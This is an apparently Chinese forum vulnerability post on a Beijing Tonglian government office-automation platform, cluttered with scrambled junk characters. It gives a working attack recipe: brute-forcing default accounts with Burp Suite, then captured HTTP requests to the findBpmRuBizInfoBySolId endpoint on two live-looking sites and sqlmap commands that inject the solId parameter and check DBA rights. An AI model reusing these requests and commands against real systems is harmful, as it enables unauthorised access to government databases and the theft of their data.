% x! j, m. D5 |% ]8 m
% x6 y& `% w- p* K! r
; p8 A% a- s. u3 Z! \
8 A0 r; L7 `" T6 O6 r% i5 K h0 d# l 平台简介:4 ^, j& d, K _+ A
2 |" r, h# X9 p4 i( U/ M8 G
4 Q2 W' r- c6 C$ Q+ ]1 E
9 A* p1 R9 D) ^$ k) q $ C k2 ^* D: x; \+ Z* ]
$ m1 i. A9 M; d! j
北京同联信息技术有限公司(以下简称同联)由用友政务与用友原行业事业部团队合伙出资成立。同联以“为全国各级政府单位提供信息化咨询规划、建设解决方案和信息化运维服务,以加强各级政府的精细化、智能化管理,形成高效、敏捷、便民的新型政府。”为使命,致力于为各级政府单位提供专业、标准、灵活、易用的信息化产品及专业的服务。 0 t- o% a3 r$ {
同联面向政府单位提供专业、标准、灵活、易用的信息化产品。针对各级政府单位,分别提供以“移动政务办公”为主的Da3系列管理软件;针对政法单位提供以“协同办案”为核心的政法协同办案系统等。
6 L6 \) d3 U8 W: p, N同联本着“协作、专业、创新”的工作方针,为推动各级政府单位信息化、促进各级政府快速转型为 “智慧型政府”做出积极贡献!9 g$ v: V& u8 t% e( z
% u( ], d3 C$ ^! T. {' }+ K( ]2 \( d
: V/ j! g6 ~$ S8 b: b b
0 M4 d% q H1 s, ]
4 F' _' o9 e; K( ? c" I! g, q& U( E$ h* Y( [) L0 p5 W' t
由于此程序为新开发的程序,故能找到的案例并不多,下面附案例地址:
3 @ B4 a8 N6 `1 [6 Z
5 {' w# l4 D4 x. j+ ^( n* {, n/ }9 l
3 i. n/ l) M+ j& G; I( D
% q/ G+ l! W7 }" ^0 G. o q
; F) ~- J' }7 p; V: s8 n7 `. t) P/ j+ g
http://1.1.1.1:7197/cap-aco/#(案例2-)- n2 l% v* o0 P. q
" P4 L% q+ C. r- S1 {7 \% [ y
9 i" {0 h( s% y; g: c8 i http://www.XXOO.com (案例1-官网网站)
. M& E7 Z, e+ p7 |. w y
7 [7 ?2 ^' y1 Z( W' V9 A/ E, D; N3 \3 ^
' r) s5 l0 S$ X6 Q! p
* m# ? l+ O: w' [3 L. u: f7 W
! i. v$ }( S3 G 漏洞详情:( Q' f& P" Z; t: u; {5 c( ^
1 A/ `6 ~, [2 f: I% c0 e3 T. x7 o; E5 I* m! F& I1 y
初步确定平台的默认账号为姓名的首字母小写,初始密码为123,为了能够更好的模拟入侵,使用黑盒测试手段进行测试
% H$ S1 m1 B( {0 V7 a( Z+ B# q, G; ~5 ?
" X# O) l h' `" e9 |( k( [0 V$ W8 U# r6 g3 A
首先使用burpsuite代理,然后再用黑客字典生成一个全英文小写的3位字典,利用burpsuite进行暴力破解,破解结果如图:
% K8 X$ I! x1 R, b" m 3 Z: `5 k. G% G A+ C
- h, B) n0 R1 {7 B+ o" H $ Q r" L- r8 _0 b3 e
) s. D' h5 G1 \1 ?: r+ H3 c
7 A X* @: e- f% l6 L
5 ^ r( l4 A: ]1 a- E. Z) f' r8 Y . M* }' }: g4 G- }1 r. O" J
: j: ]* [, y/ Z3 O9 Q
status为302即表示破解成功,然后找个破解成功的账号登录系统。经过长时间的手工测试发现在发文管理模块抓包,抓包的数据分别如下:
# p2 V! j; J2 L% q8 s 3 V! N1 _# L1 [% M! @
% p6 D4 L; H, w+ ]
1、案例1-官方网站7 T( i/ D) H% s2 g% W
5 e1 [3 Z: A* O) a& e8 t
! N8 ^9 r# C# J: p( [ GET /bpmRuBizInfoController/findBpmRuBizInfoBySolId?rows=10&page=0&solId=42b0234e-d5dc-402d-9cef-1ce38cbae480&state=&title=1111&sortOrder=DESC&query=bizTitle_%3D%26URGENCY_%3D%26STATE_%3D%26startTime%3D%26endTime%3D&_=1510060789826 HTTP/1.1
T) k: n! I% z6 C
: `1 B e) @# k6 m u5 g* e
& p9 n9 S& G, P9 D- q0 t7 } Host: www.XXOO.com b. C8 c2 D( k% z
1 `3 Q" M, ]3 F' M Y
1 p( m( A; X+ g, L$ r4 Q Proxy-Connection: Keep-Alive
3 ~, x& ?$ T3 j" t
8 }/ ^ c9 C; z2 E2 s; T3 ]. G: m' Y7 A2 k/ a0 @
Accept: application/json, text/javascript, */*; q=0.01 z. f2 J' |) _1 I! p" B# A
# Z5 F$ w, f$ w4 i5 ]8 H
: f; d6 y7 m8 R- d1 J& H/ T& z Accept-Language: zh-CN+ i! B" \* U ]# j9 O6 m" q
( x; ?1 h9 v& l8 J; X7 Y
" {- r s1 h/ S& g( R, C! M Content-Type: application/json1 O9 n3 \2 Y: B% a5 G( ~
% ?; U+ x3 y# K9 X, z( G
! @5 I" ^, P" x( w0 [- o. F
User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0; SE 2.X MetaSr 1.0) like Gecko
& c7 R2 B! [, E - P3 M: H9 v5 e9 X$ f& b, r
0 {* @) F G: H
X-Requested-With: XMLHttpRequest
( x/ G1 O4 M* a& M0 ]9 c4 w
2 D" p$ W G1 h7 i7 {9 i t$ ]" G% |5 g# Y3 }. F* [
Referer: http://www.XXOO.com/bizRunContro ... 80?modCode=1008M002
9 \ w) b- H% W% N" R$ T% Z
- z/ Q0 V$ A$ l3 X1 |
% P; D# ?7 C! G" v# h5 W9 k Accept-Encoding: gzip, deflate, sdch# X/ O& x) h: Q
- y4 m2 D: w; y
7 w; H6 k! _3 M$ d Cookie: username=chm; password=123; rememberme=1; autoSubmit=1; sid=2cf5142f-6c1e-4cbb-89d8-2ebd08438b2e
3 W0 P3 S5 w+ b / b. e. G" @' V8 D5 |
/ `( _6 B% Z( Y) G7 N) n1 G% X$ Z 将上面post数据包复制到txt文本里保存为tl.txt并将其放到sqlmap根目录下利用sqlmap注入命令为:sqlmap.py -r tl.txt --dbms=mysql --level 5 --risk 3 --tamper=space2hash.py -p solId --is-dba 注入如图:
$ ^ @0 }$ s% q
4 z& |7 I/ D. }! r- N
8 J2 g; L; A, t& M
5 c V+ Q% l) k1 H- U8 U0 v' l ' j9 T" ?# j3 h# x/ _7 i
1 R3 q4 U0 d# I- p# f$ Q' ?" Q; C
3 I0 X( i) d' z. F! s 6 ~2 \8 ~7 u3 ?5 L$ W3 }1 \
}; t9 I3 U4 f( A0 O7 U
( k% X# z$ z$ V6 Q
2 R: [/ a, D! l# u$ t3 x* F- s3 {" ~* z, B
3 F0 P% }; x6 ^. q1 g3 S
T( R# T4 s2 v$ ]1 h6 l, H$ S/ r V6 w
9 K4 q( U" d3 h; z7 i4 D8 _' l3 n
9 U2 E2 J# A1 W/ i" g# ?: ]8 [ S `& ?, f
2、案例2-某天河云平台
. W& V, }* q$ ^9 ^* Y * I* m# ?$ ]5 u/ O, {' s
$ }9 y" H* E( ~' l GET /cap-aco/bpmRuBizInfoController/findBpmRuBizInfoBySolId?rows=10&page=0&solId=af056885-4ae5-4e0b-8a0d-c413a786f2db&state=&title=11111&sortOrder=DESC&query=bizTitle_%3D%26URGENCY_%3D%26STATE_%3D%26startTime%3D%26endTime%3D&_=1510047738662 HTTP/1.1
1 K1 }% |- b% a, b6 ]$ g
/ G3 v1 G5 D1 j: n6 e! V" h( Y, Z- D4 s1 |1 n: A1 B
Host: 1.1.1.:7197
: @& D9 k. K3 e- |
: x% L2 n- ~3 k$ I" a% x6 b/ o" ^4 k; u# ?+ r
Accept: application/json, text/javascript, */*; q=0.012 e @/ g/ Q. y) [ b+ U) }
3 P- u# Z& u$ F6 o7 e I4 w
$ o; @$ _8 w! f7 L+ ] X-Requested-With: XMLHttpRequest
" d1 t4 ~2 ~3 Y9 _3 q ; @. M/ r) _) M, @& ?; d
3 B2 n7 W! ?. ]- a1 X User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/49.0.2623.221 Safari/537.36 SE 2.X MetaSr 1.0
7 Q1 g/ y5 m, O
! N0 ~8 Z \2 E8 e+ E9 I/ L# l1 K, o9 ?6 t5 p* N+ b
Content-Type: application/json7 W# @7 u, }0 ]' R0 r; P% ?
1 w' }8 N0 c8 M2 l7 q' u; Q/ B
& N# W6 c- M h* r" w+ H* j Referer: http://1.1.1.1:7197/cap-aco/bizR ... 86f2db?modCode=1008 T9 t9 p3 b8 F# m% y$ I3 p
. g( W% E+ l+ `3 u( }0 h1 @ X1 Z4 r
Accept-Language: zh-CN,zh;q=0.8+ _# e% M, c7 E
* u+ w7 ?) e0 S" h* z O, U( i* K2 ?' E9 s) R
Cookie: autoSubmit=1; sid=4e333ec9-d194-456b-bb08-4ff64c6eb1fc; username=lxr; password=123; rememberme=1; autoSubmit=1" C1 m4 ^* T+ H
4 ~4 I) M& n P
/ l9 [2 X& ^: \0 r- n' r& g Connection: close
6 Z8 b' a( v2 j
: H2 D! _# W+ K% x i# h @' s# w6 k2 Q+ K: U) S9 Q/ `4 y
将上面post数据包复制到txt文本里保存为tl.txt并将其放到sqlmap根目录下利用sqlmap注入命令为:sqlmap.py -r 1.txt --dbms=mysql --level 5 --risk 3 --tamper=space2hash.py -p solId --is-dba 注入如图:
2 s4 n8 J, M( u% S- B6 T. J ( P. H) D1 g7 i' B5 D" H
. i! f; u& x. y# e
/ j/ ^% K4 q) l/ \2 a; Y; U' f
' q! T# M. N7 D
6 k8 `) j" b7 f6 ~: ^
6 K1 |; d3 j: m |